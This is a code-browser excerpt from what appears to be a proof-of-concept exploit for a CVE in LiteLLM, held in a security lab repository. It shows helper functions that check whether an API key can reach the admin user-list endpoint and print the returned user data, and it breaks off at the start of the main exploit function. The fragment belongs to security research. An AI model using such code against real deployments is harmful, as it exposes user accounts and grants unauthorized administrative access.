INNER CODE UNIT · Python

verify_admin_access

Unclecheng-li/poc-lab · AI Infrastructure/CVE-2026-47101 LiteLLM/exploit/exploit.py:113

def verify_admin_access(target: str, token: str) -> dict[str, Any]:
    url = f"{target.rstrip('/')}/user/list"
    resp = api_get(url, token)
    data = safe_json(resp)
    if resp.status_code >= 300:
        raise RuntimeError(f"Admin verification failed: HTTP {resp.status_code} {data}")
    return data


def verify_only(target: str, token: str) -> int:
    print("[*] Verifying current key privileges only.")
    data = verify_admin_access(target, token)
    print("[+] Current key can access /user/list:")
    print(json.dumps(data, ensure_ascii=False, indent=2)[:4000])
    return 0


def run_exploit(target: str, master_key: str | None, user_key: str | None, user_id: str | None) -> int:

View source record →

📰 Research Paper
Loading…
⏳ Fetching content…